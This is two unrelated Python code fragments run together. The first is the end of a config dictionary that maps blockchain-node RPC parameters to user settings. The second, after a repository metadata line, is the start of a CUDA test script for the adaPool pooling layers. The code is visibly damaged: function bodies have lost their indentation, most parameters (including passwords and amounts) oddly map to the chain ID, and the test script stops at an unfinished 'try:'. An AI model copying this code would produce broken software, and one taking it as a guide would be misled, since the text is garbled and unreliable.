"z99_CS_TRIGGER_COINBASE_CONTRACT_tx": ucid.get('my_chainid'),
"z99_CS_TRIGGER_COINBASE_CONTRACT_blockHeader": ucid.get('my_chainid'),
"z99_CS_TRIGGER_COINBASE_CONTRACT_stateRoot": ucid.get('my_chainid'),
"z100_CS_UPDATE_AGENT_CONSENSUS_STATUS_chainId": ucid.get('my_chainid'),
"z101_CS_UPDATE_AGENT_STATUS_chainId": ucid.get('my_chainid'),
"z101_CS_UPDATE_AGENT_STATUS_status": ucid.get('my_chainid'),
"z102_CS_VALIDBLOCK_chainId": ucid.get('my_chainid'),
"z102_CS_VALIDBLOCK_download": ucid.get('my_chainid'),
"z102_CS_VALIDBLOCK_block": ucid.get('my_chainid'),
"z103_CS_WITHDRAW_chainId": ucid.get('my_chainid'),
"z103_CS_WITHDRAW_address": ucid.get('my_address'),
"z103_CS_WITHDRAW_txHash": ucid.get('my_chainid'),
"z103_CS_WITHDRAW_password": ucid.get('my_chainid'),
"z104_DEPOSIT_VALID_chainId": ucid.get('my_chainid'),
"z104_DEPOSIT_VALID_tx": ucid.get('my_chainid'),
"z105_GET_ASSETS_BY_ID_chainId": ucid.get('my_chainid'),
"z105_GET_ASSETS_BY_ID_assetIds": ucid.get('my_chainid'),
"z106_GET_BALANCE_chainId": ucid.get('my_chainid'),
"z106_GET_BALANCE_assetChainId": ucid.get('my_chainid'),
"z106_GET_BALANCE_assetId": ucid.get('my_chainid'),
"z106_GET_BALANCE_address": ucid.get('my_address'),
"z107_GET_BALANCE_NONCE_chainId": ucid.get('my_chainid'),
"z107_GET_BALANCE_NONCE_assetChainId": ucid.get('my_chainid'),
"z107_GET_BALANCE_NONCE_assetId": ucid.get('my_chainid'),
"z107_GET_BALANCE_NONCE_address": ucid.get('my_address'),
"z107_GET_BALANCE_NONCE_isConfirmed": ucid.get('my_chainid'),
"z108_GET_BLOCK_BY_HASH_chainId": ucid.get('my_chainid'),
"z108_GET_BLOCK_BY_HASH_hash": ucid.get('my_chainid'),
"z109_GET_BLOCK_BY_HEIGHT_chainId": ucid.get('my_chainid'),
"z109_GET_BLOCK_BY_HEIGHT_height": ucid.get('my_chainid'),
"z110_GET_BLOCKHEADER_BY_HASH_chainId": ucid.get('my_chainid'),
"z110_GET_BLOCKHEADER_BY_HASH_hash": ucid.get('my_chainid'),
"z111_GET_BLOCKHEADER_BY_HEIGHT_chainId": ucid.get('my_chainid'),
"z111_GET_BLOCKHEADER_BY_HEIGHT_height": ucid.get('my_chainid'),
"z112_GET_BLOCKHEADER_PO_BY_HASH_chainId": ucid.get('my_chainid'),
"z112_GET_BLOCKHEADER_PO_BY_HASH_hash": ucid.get('my_chainid'),
"z113_GET_BLOCKHEADER_POBY_HEIGHT_chainId": ucid.get('my_chainid'),
"z113_GET_BLOCKHEADER_POBY_HEIGHT_height": ucid.get('my_chainid'),
"z114_GET_BLOCKHEADERS_BY_HEIGHT_RANGE_chainId": ucid.get('my_chainid'),
"z114_GET_BLOCKHEADERS_BY_HEIGHT_RANGE_begin": ucid.get('my_chainid'),
"z114_GET_BLOCKHEADERS_BY_HEIGHT_RANGE_end": ucid.get('my_chainid'),
"z115_GET_BLOCKHEADERS_FOR_PROTOCOL_chainId": ucid.get('my_chainid'),
"z115_GET_BLOCKHEADERS_FOR_PROTOCOL_interval": ucid.get('my_chainid'),
"z116_GET_BYZANTINE_COUNT_chainId": ucid.get('my_chainid'),
"z117_GET_CIRCULAT_chainId": ucid.get('my_chainid'),
"z117_GET_CIRCULAT_nodeId": ucid.get('my_chainid'),
"z117_GET_CIRCULAT_messageBody": ucid.get('my_chainid'),
"z119_GET_CROSSTX_STATE_chainId": ucid.get('my_chainid'),
"z119_GET_CROSSTX_STATE_txHash": ucid.get('my_chainid'),
"z120_GET_CTX_chainId": ucid.get('my_chainid'),
"z120_GET_CTX_nodeId": ucid.get('my_chainid'),
"z120_GET_CTX_messageBody": ucid.get('my_chainid'),
"z121_GET_CTX_STATE_chainId": ucid.get('my_chainid'),
"z121_GET_CTX_STATE_nodeId": ucid.get('my_chainid'),
"z121_GET_CTX_STATE_messageBody": ucid.get('my_chainid'),
"z122_GET_FRIEND_CHAIN_CIRCULATE_chainId": ucid.get('my_chainid'),
"z122_GET_FRIEND_CHAIN_CIRCULATE_assetIds": ucid.get('my_chainid'),
"z123_GET_LATEST_BLOCKHEADERS_chainId": ucid.get('my_chainid'),
"z123_GET_LATEST_BLOCKHEADERS_size": ucid.get('my_chainid'),
"z124_GET_LATEST_ROUND_BLOCKHEADERS_chainId": ucid.get('my_chainid'),
"z124_GET_LATEST_ROUND_BLOCKHEADERS_round": ucid.get('my_chainid'),
"z125_GET_NONCE_chainId": ucid.get('my_chainid'),
"z125_GET_NONCE_assetChainId": ucid.get('my_chainid'),
"z125_GET_NONCE_assetId": ucid.get('my_chainid'),
"z125_GET_NONCE_address": ucid.get('my_address'),
"z125_GET_NONCE_isConfirmed": ucid.get('my_chainid'),
"z126_GET_OTHERCTX_chainId": ucid.get('my_chainid'),
"z126_GET_OTHERCTX_nodeId": ucid.get('my_chainid'),
"z126_GET_OTHERCTX_messageBody": ucid.get('my_chainid'),
"z128_GET_ROUND_BLOCKHEADERS_chainId": ucid.get('my_chainid'),
"z128_GET_ROUND_BLOCKHEADERS_height": ucid.get('my_chainid'),
"z128_GET_ROUND_BLOCKHEADERS_round": ucid.get('my_chainid'),
"z129_GET_STATUS_chainId": ucid.get('my_chainid'),
"z130_GET_VERSION_chainId": ucid.get('my_chainid'),
"z131_INFO_chainId": ucid.get('my_chainid'),
"z132_LATEST_BLOCK_chainId": ucid.get('my_chainid'),
"z133_LATEST_BLOCKHEADER_chainId": ucid.get('my_chainid'),
"z134_LATEST_BLOCKHEADER_PO_chainId": ucid.get('my_chainid'),
"z135_LATEST_HEIGHT_chainId": ucid.get('my_chainid'),
"z137_MSG_PROCESS_chainId": ucid.get('my_chainid'),
"z137_MSG_PROCESS_nodeId": ucid.get('my_chainid'),
"z137_MSG_PROCESS_cmd": ucid.get('my_chainid'),
"z137_MSG_PROCESS_messageBody": ucid.get('my_chainid'),
"z138_NEW_BLOCK_HEIGHT_chainId": ucid.get('my_chainid'),
"z138_NEW_BLOCK_HEIGHT_height": ucid.get('my_chainid'),
"z139_NW_ACTIVE_CROSS_chainId": ucid.get('my_chainid'),
"z139_NW_ACTIVE_CROSS_maxOut": ucid.get('my_chainid'),
"z139_NW_ACTIVE_CROSS_maxIn": ucid.get('my_chainid'),
"z139_NW_ACTIVE_CROSS_seedIps": ucid.get('my_chainid'),
"z140_NW_ADD_NODES_chainId": ucid.get('my_chainid'),
"z140_NW_ADD_NODES_isCross": ucid.get('my_chainid'),
"z140_NW_ADD_NODES_nodes": ucid.get('my_chainid'),
"z141_NW_BROADCAST_chainId": ucid.get('my_chainid'),
"z141_NW_BROADCAST_excludeNodes": ucid.get('my_chainid'),
"z141_NW_BROADCAST_messageBody": ucid.get('my_chainid'),
"z141_NW_BROADCAST_command": ucid.get('my_chainid'),
"z141_NW_BROADCAST_isCross": ucid.get('my_chainid'),
"z141_NW_BROADCAST_percent": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_chainId": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_magicNumber": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_maxOut": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_maxIn": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_minAvailableCount": ucid.get('my_chainid'),
"z142_NW_CREATE_NODEGROUP_isCrossGroup": ucid.get('my_chainid'),
"z143_NW_DEL_NODES_chainId": ucid.get('my_chainid'),
"z143_NW_DEL_NODES_nodes": ucid.get('my_chainid'),
"z144_NW_GET_CHAIN_CONNECT_AMOUNT_chainId": ucid.get('my_chainid'),
"z144_NW_GET_CHAIN_CONNECT_AMOUNT_isCross": ucid.get('my_chainid'),
"z145_NW_GET_GROUP_BY_CHAINID_chainId": ucid.get('my_chainid'),
"z146_NW_GET_GROUPS_startPage": ucid.get('my_chainid'),
"z146_NW_GET_GROUPS_pageSize": ucid.get('my_chainid'),
"z147_NW_GET_NODES_chainId": ucid.get('my_chainid'),
"z147_NW_GET_NODES_state": ucid.get('my_chainid'),
"z147_NW_GET_NODES_isCross": ucid.get('my_chainid'),
"z147_NW_GET_NODES_startPage": ucid.get('my_chainid'),
"z147_NW_GET_NODES_pageSize": ucid.get('my_chainid'),
"z149_NW_INFO_chainId": ucid.get('my_chainid'),
"z150_NW_NODES_chainId": ucid.get('my_chainid'),
"z151_NW_PROTOCOL_REGISTER_role": ucid.get('my_chainid'),
"z151_NW_PROTOCOL_REGISTER_protocolCmds": ucid.get('my_chainid'),
"z152_NW_RECONNECT_chainId": ucid.get('my_chainid'),
"z153_NW_SEND_PEERS_MSG_chainId": ucid.get('my_chainid'),
"z153_NW_SEND_PEERS_MSG_nodes": ucid.get('my_chainid'),
"z153_NW_SEND_PEERS_MSG_messageBody": ucid.get('my_chainid'),
"z153_NW_SEND_PEERS_MSG_command": ucid.get('my_chainid'),
"z154_NW_UPDATE_NODE_INFO_chainId": ucid.get('my_chainid'),
"z154_NW_UPDATE_NODE_INFO_nodeId": ucid.get('my_chainid'),
"z154_NW_UPDATE_NODE_INFO_blockHeight": ucid.get('my_chainid'),
"z154_NW_UPDATE_NODE_INFO_blockHash": ucid.get('my_chainid'),
"z155_PARAM_TEST_CMD_intCount": ucid.get('my_chainid'),
"z155_PARAM_TEST_CMD_byteCount": ucid.get('my_chainid'),
"z155_PARAM_TEST_CMD_shortCount": ucid.get('my_chainid'),
"z155_PARAM_TEST_CMD_longCount": ucid.get('my_chainid'),
"z156_PROTOCOL_VERSION_CHANGE_chainId": ucid.get('my_chainid'),
"z156_PROTOCOL_VERSION_CHANGE_protocolVersion": ucid.get('my_chainid'),
"z157_RECEIVE_PACKING_BLOCK_chainId": ucid.get('my_chainid'),
"z157_RECEIVE_PACKING_BLOCK_block": ucid.get('my_chainid'),
"z158_RECV_CIRCULAT_chainId": ucid.get('my_chainid'),
"z158_RECV_CIRCULAT_nodeId": ucid.get('my_chainid'),
"z158_RECV_CIRCULAT_messageBody": ucid.get('my_chainid'),
"z159_RECV_CTX_chainId": ucid.get('my_chainid'),
"z159_RECV_CTX_nodeId": ucid.get('my_chainid'),
"z159_RECV_CTX_messageBody": ucid.get('my_chainid'),
"z160_RECV_CTX_HASH_chainId": ucid.get('my_chainid'),
"z160_RECV_CTX_HASH_nodeId": ucid.get('my_chainid'),
"z160_RECV_CTX_HASH_messageBody": ucid.get('my_chainid'),
"z161_RECV_CTX_SIGN_chainId": ucid.get('my_chainid'),
"z161_RECV_CTX_SIGN_nodeId": ucid.get('my_chainid'),
"z161_RECV_CTX_SIGN_messageBody": ucid.get('my_chainid'),
"z162_RECV_CTX_STATE_chainId": ucid.get('my_chainid'),
"z162_RECV_CTX_STATE_nodeId": ucid.get('my_chainid'),
"z162_RECV_CTX_STATE_messageBody": ucid.get('my_chainid'),
"z163_RECV_OTHER_CTX_chainId": ucid.get('my_chainid'),
"z163_RECV_OTHER_CTX_nodeId": ucid.get('my_chainid'),
"z163_RECV_OTHER_CTX_messageBody": ucid.get('my_chainid'),
"z164_RECV_REGCHAIN_chainId": ucid.get('my_chainid'),
"z164_RECV_REGCHAIN_nodeId": ucid.get('my_chainid'),
"z164_RECV_REGCHAIN_messageBody": ucid.get('my_chainid'),
"z166_REGISTER_PROTOCOL_chainId": ucid.get('my_chainid'),
"z166_REGISTER_PROTOCOL_moduleCode": ucid.get('my_chainid'),
"z166_REGISTER_PROTOCOL_list": ucid.get('my_chainid'),
"z167_ROLLBACK_BLOCK_TXS_chainId": ucid.get('my_chainid'),
"z167_ROLLBACK_BLOCK_TXS_txList": ucid.get('my_chainid'),
"z167_ROLLBACK_BLOCK_TXS_blockHeight": ucid.get('my_chainid'),
"z168_ROLLBACK_UNCONFIRM_TX_chainId": ucid.get('my_chainid'),
"z168_ROLLBACK_UNCONFIRM_TX_tx": ucid.get('my_chainid'),
"z169_ROLLBACK_BLOCK_chainId": ucid.get('my_chainid'),
"z169_ROLLBACK_BLOCK_blockHeader": ucid.get('my_chainid'),
"z170_ROLLBACK_TX_VALIDATE_STATUS_chainId": ucid.get('my_chainid'),
"z170_ROLLBACK_TX_VALIDATE_STATUS_tx": ucid.get('my_chainid'),
"z171_SAVE_BLOCK_chainId": ucid.get('my_chainid'),
"z171_SAVE_BLOCK_blockHeader": ucid.get('my_chainid'),
"z172_SC_BATCH_BEFORE_END_chainId": ucid.get('my_chainid'),
"z172_SC_BATCH_BEFORE_END_blockType": ucid.get('my_chainid'),
"z172_SC_BATCH_BEFORE_END_blockHeight": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_chainId": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_blockType": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_blockHeight": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_blockTime": ucid.get('my_chainid'),
"z173_SC_BATCH_BEGIN_packingAddress": ucid.get('my_address'),
"z173_SC_BATCH_BEGIN_preStateRoot": ucid.get('my_chainid'),
"z174_SC_BATCH_END_chainId": ucid.get('my_chainid'),
"z174_SC_BATCH_END_blockHeight": ucid.get('my_chainid'),
"z175_SC_CALL_chainId": ucid.get('my_chainid'),
"z175_SC_CALL_sender": ucid.get('my_chainid'),
"z175_SC_CALL_password": ucid.get('my_chainid'),
"z175_SC_CALL_value": ucid.get('my_chainid'),
"z175_SC_CALL_gasLimit": ucid.get('my_chainid'),
"z175_SC_CALL_price": ucid.get('my_chainid'),
"z175_SC_CALL_contractAddress": ucid.get('my_address'),
"z175_SC_CALL_methodName": ucid.get('my_chainid'),
"z175_SC_CALL_methodDesc": ucid.get('my_chainid'),
"z175_SC_CALL_args": ucid.get('my_chainid'),
"z175_SC_CALL_remark": ucid.get('my_chainid'),
"z176_SC_CALL_VALIDATOR_chainId": ucid.get('my_chainid'),
"z176_SC_CALL_VALIDATOR_tx": ucid.get('my_chainid'),
"z177_SC_CONSTRUCTOR_chainId": ucid.get('my_chainid'),
"z177_SC_CONSTRUCTOR_contractCode": ucid.get('my_chainid'),
"z178_SC_CONTRACT_INFO_chainId": ucid.get('my_chainid'),
"z178_SC_CONTRACT_INFO_contractAddress": ucid.get('my_address'),
"z179_SC_CONTRACT_OFFLINE_TX_HASH_LIST_chainId": ucid.get('my_chainid'),
"z179_SC_CONTRACT_OFFLINE_TX_HASH_LIST_blockHash": ucid.get('my_chainid'),
"z180_SC_CONTRACT_RESULT_chainId": ucid.get('my_chainid'),
"z180_SC_CONTRACT_RESULT_hash": ucid.get('my_chainid'),
"z181_SC_CONTRACT_RESULT_LIST_chainId": ucid.get('my_chainid'),
"z181_SC_CONTRACT_RESULT_LIST_hashList": ucid.get('my_chainid'),
"z182_SC_CONTRACT_TX_chainId": ucid.get('my_chainid'),
"z182_SC_CONTRACT_TX_hash": ucid.get('my_chainid'),
"z183_SC_CREATE_chainId": ucid.get('my_chainid'),
"z183_SC_CREATE_sender": ucid.get('my_chainid'),
"z183_SC_CREATE_password": ucid.get('my_chainid'),
"z183_SC_CREATE_alias": ucid.get('my_chainid'),
"z183_SC_CREATE_gasLimit": ucid.get('my_chainid'),
"z183_SC_CREATE_price": ucid.get('my_chainid'),
"z183_SC_CREATE_contractCode": ucid.get('my_chainid'),
"z183_SC_CREATE_args": ucid.get('my_chainid'),
"z183_SC_CREATE_remark": ucid.get('my_chainid'),
"z184_SC_CREATE_VALIDATOR_chainId": ucid.get('my_chainid'),
"z184_SC_CREATE_VALIDATOR_tx": ucid.get('my_chainid'),
"z185_SC_DELETE_chainId": ucid.get('my_chainid'),
"z185_SC_DELETE_sender": ucid.get('my_chainid'),
"z185_SC_DELETE_password": ucid.get('my_chainid'),
"z185_SC_DELETE_contractAddress": ucid.get('my_address'),
"z185_SC_DELETE_remark": ucid.get('my_chainid'),
"z186_SC_DELETE_VALIDATOR_chainId": ucid.get('my_chainid'),
"z186_SC_DELETE_VALIDATOR_tx": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_chainId": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_sender": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_value": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_contractAddress": ucid.get('my_address'),
"z187_SC_IMPUTED_CALL_GAS_methodName": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_methodDesc": ucid.get('my_chainid'),
"z187_SC_IMPUTED_CALL_GAS_args": ucid.get('my_chainid'),
"z188_SC_IMPUTED_CREATE_GAS_chainId": ucid.get('my_chainid'),
"z188_SC_IMPUTED_CREATE_GAS_sender": ucid.get('my_chainid'),
"z188_SC_IMPUTED_CREATE_GAS_contractCode": ucid.get('my_chainid'),
"z188_SC_IMPUTED_CREATE_GAS_args": ucid.get('my_chainid'),
"z189_SC_INITIAL_ACCOUNT_TOKEN_chainId": ucid.get('my_chainid'),
"z189_SC_INITIAL_ACCOUNT_TOKEN_address": ucid.get('my_address'),
"z190_SC_INVOKE_CONTRACT_chainId": ucid.get('my_chainid'),
"z190_SC_INVOKE_CONTRACT_blockType": ucid.get('my_chainid'),
"z190_SC_INVOKE_CONTRACT_tx": ucid.get('my_chainid'),
"z191_SC_INVOKE_VIEW_chainId": ucid.get('my_chainid'),
"z191_SC_INVOKE_VIEW_contractAddress": ucid.get('my_address'),
"z191_SC_INVOKE_VIEW_methodName": ucid.get('my_chainid'),
"z191_SC_INVOKE_VIEW_methodDesc": ucid.get('my_chainid'),
"z191_SC_INVOKE_VIEW_args": ucid.get('my_chainid'),
"z192_SC_PACKAGE_BATCH_END_chainId": ucid.get('my_chainid'),
"z192_SC_PACKAGE_BATCH_END_blockHeight": ucid.get('my_chainid'),
"z193_SC_TOKEN_ASSETS_LIST_chainId": ucid.get('my_chainid'),
"z193_SC_TOKEN_ASSETS_LIST_address": ucid.get('my_address'),
"z193_SC_TOKEN_ASSETS_LIST_pageNumber": ucid.get('my_chainid'),
"z193_SC_TOKEN_ASSETS_LIST_pageSize": ucid.get('my_chainid'),
"z194_SC_TOKEN_BALANCE_chainId": ucid.get('my_chainid'),
"z194_SC_TOKEN_BALANCE_contractAddress": ucid.get('my_address'),
"z194_SC_TOKEN_BALANCE_address": ucid.get('my_address'),
"z195_SC_TOKEN_TRANSFER_chainId": ucid.get('my_chainid'),
"z195_SC_TOKEN_TRANSFER_address": ucid.get('my_address'),
"z195_SC_TOKEN_TRANSFER_toAddress": ucid.get('my_address'),
"z195_SC_TOKEN_TRANSFER_contractAddress": ucid.get('my_address'),
"z195_SC_TOKEN_TRANSFER_password": ucid.get('my_chainid'),
"z195_SC_TOKEN_TRANSFER_amount": ucid.get('my_chainid'),
"z195_SC_TOKEN_TRANSFER_remark": ucid.get('my_chainid'),
"z196_SC_TOKEN_TRANSFER_LIST_chainId": ucid.get('my_chainid'),
"z196_SC_TOKEN_TRANSFER_LIST_address": ucid.get('my_address'),
"z196_SC_TOKEN_TRANSFER_LIST_pageNumber": ucid.get('my_chainid'),
"z196_SC_TOKEN_TRANSFER_LIST_pageSize": ucid.get('my_chainid'),
"z197_SC_TRANSFER_chainId": ucid.get('my_chainid'),
"z197_SC_TRANSFER_address": ucid.get('my_address'),
"z197_SC_TRANSFER_toAddress": ucid.get('my_address'),
"z197_SC_TRANSFER_password": ucid.get('my_chainid'),
"z197_SC_TRANSFER_amount": ucid.get('my_chainid'),
"z197_SC_TRANSFER_remark": ucid.get('my_chainid'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_chainId": ucid.get('my_chainid'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_stateRoot": ucid.get('my_chainid'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_blockHeight": ucid.get('my_chainid'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_contractAddress": ucid.get('my_address'),
"z198_SC_TRIGGER_PAYABLE_FOR_CONSENSUS_CONTRACT_tx": ucid.get('my_chainid'),
"z199_SC_UPLOAD_chainId": ucid.get('my_chainid'),
"z199_SC_UPLOAD_jarFileData": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_chainId": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_sender": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_value": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_gasLimit": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_price": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_contractAddress": ucid.get('my_address'),
"z200_SC_VALIDATE_CALL_methodName": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_methodDesc": ucid.get('my_chainid'),
"z200_SC_VALIDATE_CALL_args": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_chainId": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_sender": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_gasLimit": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_price": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_contractCode": ucid.get('my_chainid'),
"z201_SC_VALIDATE_CREATE_args": ucid.get('my_chainid'),
"z202_SC_VALIDATE_DELETE_chainId": ucid.get('my_chainid'),
"z202_SC_VALIDATE_DELETE_contractAddress": ucid.get('my_address'),
"z203_STOP_AGENTVALID_chainId": ucid.get('my_chainid'),
"z203_STOP_AGENTVALID_tx": ucid.get('my_chainid'),
"z204_TX_COMMIT_chainId": ucid.get('my_chainid'),
"z204_TX_COMMIT_txList": ucid.get('my_chainid'),
"z204_TX_COMMIT_blockHeader": ucid.get('my_chainid'),
"z205_TX_VALIDATOR_chainId": ucid.get('my_chainid'),
"z205_TX_VALIDATOR_txList": ucid.get('my_chainid'),
"z205_TX_VALIDATOR_blockHeader": ucid.get('my_chainid'),
"z206_TX_BACK_PACKABLE_TXS_chainId": ucid.get('my_chainid'),
"z206_TX_BACK_PACKABLE_TXS_txList": ucid.get('my_chainid'),
"z207_TX_BATCH_VERIFY_chainId": ucid.get('my_chainid'),
"z207_TX_BATCH_VERIFY_txList": ucid.get('my_chainid'),
"z207_TX_BATCH_VERIFY_blockHeader": ucid.get('my_chainid'),
"z207_TX_BATCH_VERIFY_preStateRoot": ucid.get('my_chainid'),
"z208_TX_BL_STATE_chainId": ucid.get('my_chainid'),
"z208_TX_BL_STATE_status": ucid.get('my_chainid'),
"z209_TX_BLOCK_HEIGHT_chainId": ucid.get('my_chainid'),
"z209_TX_BLOCK_HEIGHT_height": ucid.get('my_chainid'),
"z210_TX_CS_STATE_chainId": ucid.get('my_chainid'),
"z210_TX_CS_STATE_packaging": ucid.get('my_chainid'),
"z211_TX_GET_BLOCKTXS_chainId": ucid.get('my_chainid'),
"z211_TX_GET_BLOCKTXS_txHashList": ucid.get('my_chainid'),
"z212_TX_GET_BLOCKTXS_EXTEND_chainId": ucid.get('my_chainid'),
"z212_TX_GET_BLOCKTXS_EXTEND_txHashList": ucid.get('my_chainid'),
"z212_TX_GET_BLOCKTXS_EXTEND_allHits": ucid.get('my_chainid'),
"z213_TX_GET_CONFIRMED_TX_chainId": ucid.get('my_chainid'),
"z213_TX_GET_CONFIRMED_TX_txHash": ucid.get('my_chainid'),
"z214_TX_GET_CONFIRMED_TX_CLIENT_chainId": ucid.get('my_chainid'),
"z214_TX_GET_CONFIRMED_TX_CLIENT_txHash": ucid.get('my_chainid'),
"z215_TX_GET_NONEXISTENT_UNCONFIRMED_HASHS_chainId": ucid.get('my_chainid'),
"z215_TX_GET_NONEXISTENT_UNCONFIRMED_HASHS_txHashList": ucid.get('my_chainid'),
"z216_TX_GET_SYSTEMTYPES_chainId": ucid.get('my_chainid'),
"z217_TX_GET_TX_chainId": ucid.get('my_chainid'),
"z217_TX_GET_TX_txHash": ucid.get('my_chainid'),
"z218_TX_GET_TX_CLIENT_chainId": ucid.get('my_chainid'),
"z218_TX_GET_TX_CLIENT_txHash": ucid.get('my_chainid'),
"z219_TX_NEWTX_chainId": ucid.get('my_chainid'),
"z219_TX_NEWTX_tx": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_chainId": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_endTimestamp": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_maxTxDataSize": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_blockTime": ucid.get('my_chainid'),
"z220_TX_PACKABLE_TXS_packingAddress": ucid.get('my_address'),
"z220_TX_PACKABLE_TXS_preStateRoot": ucid.get('my_chainid'),
"z221_TX_REGISTER_chainId": ucid.get('my_chainid'),
"z221_TX_REGISTER_moduleCode": ucid.get('my_chainid'),
"z221_TX_REGISTER_list": ucid.get('my_chainid'),
"z221_TX_REGISTER_delList": ucid.get('my_chainid'),
"z222_TX_ROLLBACK_chainId": ucid.get('my_chainid'),
"z222_TX_ROLLBACK_txHashList": ucid.get('my_chainid'),
"z222_TX_ROLLBACK_blockHeader": ucid.get('my_chainid'),
"z223_TX_SAVE_chainId": ucid.get('my_chainid'),
"z223_TX_SAVE_txList": ucid.get('my_chainid'),
"z223_TX_SAVE_contractList": ucid.get('my_chainid'),
"z223_TX_SAVE_blockHeader": ucid.get('my_chainid'),
"z224_TX_VERIFY_TX_chainId": ucid.get('my_chainid'),
"z224_TX_VERIFY_TX_tx": ucid.get('my_chainid'),
"z225_UPDATE_CHAIN_ASSET_chainId": ucid.get('my_chainid'),
"z225_UPDATE_CHAIN_ASSET_assets": ucid.get('my_chainid'),
"z226_VERIFY_COINDATA_chainId": ucid.get('my_chainid'),
"z226_VERIFY_COINDATA_tx": ucid.get('my_chainid'),
"z227_VERIFY_COINDATA_BATCH_PACKAGED_chainId": ucid.get('my_chainid'),
"z227_VERIFY_COINDATA_BATCH_PACKAGED_txList": ucid.get('my_chainid'),
"z228_WITHDRAW_VALID_chainId": ucid.get('my_chainid'),
"z228_WITHDRAW_VALID_tx": ucid.get('my_chainid'),
"z1017_AC_GET_PRIKEY_BY_ADDRESS__chainId": ucid.get('my_chainid'),
"z1017_AC_GET_PRIKEY_BY_ADDRESS_address": ucid.get('my_address'),
"z1017_AC_GET_PRIKEY_BY_ADDRESS_password": ucid.get('my_password')
}
# The entries above with numbers over z1000 were added after the original
# numbering was created; each is numbered as 1000 plus the number the entry
# should approximately have had.
def get_conf_dict(self):
return self.usr_config_ini_d
def get_user_set_dict(self):
return self.user_set_dict
63b38e1a7de201e06918463ab69551cbd87972dc | 20,526 | py | Python
| pytorch/test-files/test.py | alexandrosstergiou/adaPool | c933a71a16d8ca86a05bec71fdb0969a7c630109 | ["MIT"] | 33 | 2021-11-03T02:17:03.000Z | 2022-03-20T03:31:35.000Z
| pytorch/test-files/test.py | alexandrosstergiou/adaPool | c933a71a16d8ca86a05bec71fdb0969a7c630109 | ["MIT"] | 8 | 2021-11-15T12:26:58.000Z | 2022-01-27T15:15:03.000Z
| pytorch/test-files/test.py | alexandrosstergiou/adaPool | c933a71a16d8ca86a05bec71fdb0969a7c630109 | ["MIT"] | 6 | 2021-11-08T02:50:52.000Z | 2022-01-26T11:53:12.000Z |
import os
os.environ["CUDA_VISIBLE_DEVICES"]="0"
import torch
import adapool_cuda
from adaPool import adapool1d, adapool2d, adapool3d, AdaPool1d, AdaPool2d, AdaPool3d, adaunpool, EDSCWPool1d, EDSCWPool2d, EDSCWPool3d, EMPool1d, EMPool2d, EMPool3d
import timeit
import traceback
import sys
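# Overview of the checks below: for float16, float32 and float64 the script
# builds random 1D/2D/3D CUDA tensors and runs the forward pass (and, after
# setting requires_grad, the backward pass) through the AdaPool*, EDSCWPool*
# and EMPool* layers; unpooling with adaunpool is then exercised on float32
# inputs, and finally each operator is profiled over 100 forward and
# forward + backward iterations.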
print('\033[38;2;50;50;50;48;2;85;217;192m' + ' = = = Checks for float16 = = = ' + '\033[0m')
x_1d = torch.rand((1, 1, 8), device='cuda:0').half()
beta_1d = (4)
x_2d = torch.rand((1, 1, 8, 8), device='cuda:0').half()
beta_2d = (4,4)
x_3d = torch.rand((1, 1, 8, 8, 8), device='cuda:0').half()
beta_3d = (4,4,4)
print('\033[38;2;77;216;173m' + '--- Performing checks for forward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
k=4
s=4
p_1d = AdaPool1d(kernel_size=k, beta=(1), stride=s, return_mask=True, device='cuda:0')
_ ,mask = p_1d(x_1d)
print('kernel size:',k,'stride:',s,'\n mask:',mask[0].data)
p_2d = AdaPool2d(kernel_size=k, beta=(1,1), stride=s, return_mask=True, device='cuda:0')
_ ,mask = p_2d(x_2d)
print('kernel size:',k,'stride:',s,'\n mask:',mask[0].data)
p_3d = AdaPool3d(kernel_size=k, beta=(1,1,1), stride=s, return_mask=True, device='cuda:0')
_ ,mask = p_3d(x_3d)
print('kernel size:',k,'stride:',s,'\n mask:',mask[0].data)
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
pool_1d = p_1d(x_1d)
p_1d = EDSCWPool1d()
pool_1d = p_1d(x_1d)
p_1d = EMPool1d()
pool_1d = p_1d(x_1d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
